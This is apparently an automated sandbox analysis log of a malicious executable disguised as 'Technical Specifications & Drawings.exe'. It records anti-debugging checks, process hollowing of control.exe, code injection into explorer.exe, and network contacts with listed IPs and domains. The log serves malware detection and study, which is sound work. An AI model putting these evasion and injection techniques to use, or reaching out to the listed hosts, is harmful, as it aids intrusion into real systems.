          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E37F5 mov eax, dword ptr fs:[00000030h]4_2_017E37F5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183FF10 mov eax, dword ptr fs:[00000030h]4_2_0183FF10
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183FF10 mov eax, dword ptr fs:[00000030h]4_2_0183FF10
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878F6A mov eax, dword ptr fs:[00000030h]4_2_01878F6A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B8794 mov eax, dword ptr fs:[00000030h]4_2_017B8794
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183FE87 mov eax, dword ptr fs:[00000030h]4_2_0183FE87
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h]4_2_017CAE73
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h]4_2_017CAE73
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h]4_2_017CAE73
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h]4_2_017CAE73
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h]4_2_017CAE73
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B766D mov eax, dword ptr fs:[00000030h]4_2_017B766D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01870EA5 mov eax, dword ptr fs:[00000030h]4_2_01870EA5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01870EA5 mov eax, dword ptr fs:[00000030h]4_2_01870EA5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01870EA5 mov eax, dword ptr fs:[00000030h]4_2_01870EA5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018246A7 mov eax, dword ptr fs:[00000030h]4_2_018246A7
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h]4_2_017B7E41
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h]4_2_017B7E41
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h]4_2_017B7E41
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h]4_2_017B7E41
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h]4_2_017B7E41
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h]4_2_017B7E41
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185FEC0 mov eax, dword ptr fs:[00000030h]4_2_0185FEC0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878ED6 mov eax, dword ptr fs:[00000030h]4_2_01878ED6
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AE620 mov eax, dword ptr fs:[00000030h]4_2_017AE620
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA61C mov eax, dword ptr fs:[00000030h]4_2_017DA61C
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA61C mov eax, dword ptr fs:[00000030h]4_2_017DA61C
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AC600 mov eax, dword ptr fs:[00000030h]4_2_017AC600
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AC600 mov eax, dword ptr fs:[00000030h]4_2_017AC600
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AC600 mov eax, dword ptr fs:[00000030h]4_2_017AC600
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D8E00 mov eax, dword ptr fs:[00000030h]4_2_017D8E00
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861608 mov eax, dword ptr fs:[00000030h]4_2_01861608
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B76E2 mov eax, dword ptr fs:[00000030h]4_2_017B76E2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D16E0 mov ecx, dword ptr fs:[00000030h]4_2_017D16E0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D36CC mov eax, dword ptr fs:[00000030h]4_2_017D36CC
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E8EC7 mov eax, dword ptr fs:[00000030h]4_2_017E8EC7
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185FE3F mov eax, dword ptr fs:[00000030h]4_2_0185FE3F
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186AE44 mov eax, dword ptr fs:[00000030h]4_2_0186AE44
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186AE44 mov eax, dword ptr fs:[00000030h]4_2_0186AE44
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_017E9910
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 109.234.162.62 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mexc-event-partner.site
          Source: C:\Windows\explorer.exeDomain query: www.gzkanglongkeji.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.155.208.43 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.107.80 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 67.23.226.119 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.kirchhoff-darryl.com
          Source: C:\Windows\explorer.exeNetwork Connect: 67.223.117.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.boshi-eg.online
          Source: C:\Windows\explorer.exeDomain query: www.tomoptique.fr
          Source: C:\Windows\explorer.exeDomain query: www.esandcraic.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 1C0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeMemory written: C:\Users\user\Desktop\Technical Specifications & Drawings.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeThread register set: target process: 3968Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3968Jump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exeJump to behavior
          Source: explorer.exe, 00000005.00000000.320653170.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.265661607.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.365897983.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000005.00000000.329795271.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.302606541.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.297954102.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.365954080.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.265765381.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Users\user\Desktop\Technical Specifications & Drawings.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
